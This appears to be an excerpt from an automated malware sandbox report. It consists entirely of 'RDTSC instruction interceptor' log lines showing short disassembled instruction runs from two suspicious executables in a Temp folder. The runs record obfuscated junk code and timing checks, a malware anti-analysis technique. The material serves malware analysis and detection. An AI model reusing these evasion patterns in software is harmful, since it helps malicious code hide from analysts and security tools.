Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80B7B second address: 4B80B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C006E2 second address: 4C006F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C006F1 second address: 4C0073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, bh 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F12E108FDC5h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop ecx 0x0000001a jmp 00007F12E108FDBFh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C0073F second address: 4C00745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C00745 second address: 4C00749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C00749 second address: 4C0074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4C0074D second address: 4C00786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F12E108FDC7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F12E108FDC5h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0A22 second address: 4BF0A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0A31 second address: 4BF0A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0A55 second address: 4BF0A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0A5B second address: 4BF0A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F12E108FDBBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 push edi 0x00000013 pop eax 0x00000014 popad 0x00000015 jmp 00007F12E108FDBDh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cl, bh 0x00000022 movzx ecx, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0A9C second address: 4BF0AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0AAD second address: 4BF0AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF08BD second address: 4BF092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC87h 0x00000009 add eax, 03F7071Eh 0x0000000f jmp 00007F12E0FAFC89h 0x00000014 popfd 0x00000015 mov ecx, 1262A0E7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F12E0FAFC7Fh 0x00000028 jmp 00007F12E0FAFC83h 0x0000002d popfd 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF092C second address: 4BF0932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0932 second address: 4BF0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0936 second address: 4BF093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B9024C second address: 4B90264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90264 second address: 4B902AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c mov dx, BBE6h 0x00000010 pop edx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F12E108FDBBh 0x00000020 sbb ah, 0000006Eh 0x00000023 jmp 00007F12E108FDC9h 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B902AD second address: 4B902E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F12E0FAFC87h 0x00000009 mov ah, 15h 0x0000000b pop edx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F12E0FAFC87h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0C18 second address: 4BF0C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0C1E second address: 4BF0C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0C22 second address: 4BF0C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 mov cx, 7035h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0D1B second address: 4BF0D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0D23 second address: 4BF0D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BF0D32 second address: 4BF0D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59845E second address: 598464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 598625 second address: 598629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0723 second address: 4BA0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0729 second address: 4BA073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, di 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA073B second address: 4BA074E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 87h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e mov dx, 1856h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA074E second address: 4BA07A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov edi, 74E88D3Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F12E0FAFC87h 0x00000017 add cl, FFFFFF8Eh 0x0000001a jmp 00007F12E0FAFC89h 0x0000001f popfd 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov dh, F0h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA07A3 second address: 4BA084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A24Ch 0x00000007 pushfd 0x00000008 jmp 00007F12E108FDC5h 0x0000000d adc ecx, 145B3F26h 0x00000013 jmp 00007F12E108FDC1h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push 1509C227h 0x00000021 jmp 00007F12E108FDC7h 0x00000026 add dword ptr [esp], 61EEFDF1h 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F12E108FDC4h 0x00000034 adc cl, 00000028h 0x00000037 jmp 00007F12E108FDBBh 0x0000003c popfd 0x0000003d push eax 0x0000003e push edx 0x0000003f pushfd 0x00000040 jmp 00007F12E108FDC6h 0x00000045 xor cx, C588h 0x0000004a jmp 00007F12E108FDBBh 0x0000004f popfd 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA084D second address: 4BA0961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007F12E0FAFC79h 0x0000000f pushad 0x00000010 mov ax, D93Dh 0x00000014 pushfd 0x00000015 jmp 00007F12E0FAFC7Ah 0x0000001a adc si, DB18h 0x0000001f jmp 00007F12E0FAFC7Bh 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F12E0FAFC89h 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov ebx, 766CCB90h 0x00000037 pushfd 0x00000038 jmp 00007F12E0FAFC89h 0x0000003d sbb ah, 00000016h 0x00000040 jmp 00007F12E0FAFC81h 0x00000045 popfd 0x00000046 popad 0x00000047 push esi 0x00000048 jmp 00007F12E0FAFC87h 0x0000004d pop ecx 0x0000004e popad 0x0000004f mov eax, dword ptr [eax] 0x00000051 jmp 00007F12E0FAFC86h 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a jmp 00007F12E0FAFC7Bh 0x0000005f pop eax 0x00000060 jmp 00007F12E0FAFC86h 0x00000065 mov eax, dword ptr fs:[00000000h] 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F12E0FAFC87h 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0961 second address: 4BA0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0967 second address: 4BA096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA096B second address: 4BA0A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F12E108FDC6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F12E108FDC1h 0x00000019 sub esi, 16B00FA6h 0x0000001f jmp 00007F12E108FDC1h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F12E108FDC0h 0x0000002b or esi, 2F458D48h 0x00000031 jmp 00007F12E108FDBBh 0x00000036 popfd 0x00000037 popad 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F12E108FDBBh 0x00000042 and ax, 5F8Eh 0x00000047 jmp 00007F12E108FDC9h 0x0000004c popfd 0x0000004d mov eax, 1BE57A97h 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0A18 second address: 4BA0A32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0A32 second address: 4BA0A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0A36 second address: 4BA0A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0A3C second address: 4BA0AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e jmp 00007F12E108FDC8h 0x00000013 popad 0x00000014 push ecx 0x00000015 pushfd 0x00000016 jmp 00007F12E108FDC1h 0x0000001b jmp 00007F12E108FDBBh 0x00000020 popfd 0x00000021 pop eax 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F12E108FDBBh 0x0000002d and ecx, 0784BDBEh 0x00000033 jmp 00007F12E108FDC9h 0x00000038 popfd 0x00000039 movzx eax, di 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0AC5 second address: 4BA0AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC89h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0AE2 second address: 4BA0AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0AE6 second address: 4BA0B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F12E0FAFC7Dh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F12E0FAFC7Dh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B0C second address: 4BA0B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12E108FDBCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B30 second address: 4BA0B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12E0FAFC85h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B57 second address: 4BA0B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B5D second address: 4BA0B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B61 second address: 4BA0B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F12E108FDC1h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B81 second address: 4BA0B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B86 second address: 4BA0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0B8C second address: 4BA0B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0C75 second address: 4BA0C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0C79 second address: 4BA0C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0C7F second address: 4BA0C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0C9D second address: 4BA0CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0CA3 second address: 4BA0CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0CA9 second address: 4BA0CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0CAD second address: 4BA0CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0CB1 second address: 4BA0D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F13532BECE1h 0x0000000e pushad 0x0000000f mov eax, 52E8585Fh 0x00000014 call 00007F12E0FAFC84h 0x00000019 mov ax, A161h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov eax, 00000000h 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ebx, ecx 0x00000028 pushfd 0x00000029 jmp 00007F12E0FAFC82h 0x0000002e or ax, DF28h 0x00000033 jmp 00007F12E0FAFC7Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ecx, 025CFC1Fh 0x0000003f popad 0x00000040 mov dword ptr [ebp-20h], eax 0x00000043 jmp 00007F12E0FAFC82h 0x00000048 mov ebx, dword ptr [esi] 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d call 00007F12E0FAFC7Ch 0x00000052 pop ecx 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0D3A second address: 4BA0D83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F12E108FDC7h 0x0000000c sub si, 2E7Eh 0x00000011 jmp 00007F12E108FDC9h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [ebp-24h], ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0D83 second address: 4BA0D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0D89 second address: 4BA0DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F12E108FDC7h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0DB8 second address: 4BA0DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0DD0 second address: 4BA0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0DD4 second address: 4BA0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F13532BEB17h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F12E0FAFC7Ah 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0DEE second address: 4BA0E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02F2 second address: 4BA02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02F8 second address: 4BA02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA02FC second address: 4BA030E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82FEAB second address: 82FEBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12E108FDBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 818303 second address: 818313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82EFE5 second address: 82EFF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F12E108FDBBh 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2A3 second address: 82F2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
